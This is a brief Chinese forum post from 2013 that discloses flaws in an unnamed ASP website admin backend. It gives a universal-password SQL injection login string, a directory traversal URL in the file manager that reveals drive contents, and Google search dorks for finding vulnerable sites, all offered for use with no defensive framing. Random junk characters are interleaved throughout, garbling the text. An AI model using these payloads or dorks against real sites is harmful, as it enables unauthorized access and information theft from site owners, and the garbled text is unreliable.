后台万能密码 'or'='or'5 f+ n; {, Y2 Y: p
& G' W( O' I) R8 K \8 [后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!, Z; s Q3 k) v* X( z: i! L1 |& B- X
admin/uploadfile.asp?currentFolder=/upfiles/../- d3 l$ M; x) R G9 E
9 E; y; b4 s; h, N: Z, q2 C, v
漏洞证明:1 L# S, w D! c O0 Q5 E
4 q! b6 H. R" L" t- w- F1 N( N谷歌:inurl:type.asp?id=1 新闻中心% V% C2 V* ^8 Y9 b \' [# D
或者 :inurl:download_ok.asp?
' I7 t6 c8 H/ i% h4 M
F& M4 n0 m1 X- d |
发表于 2013-3-14 20:17:32
收藏
分享
支持
反对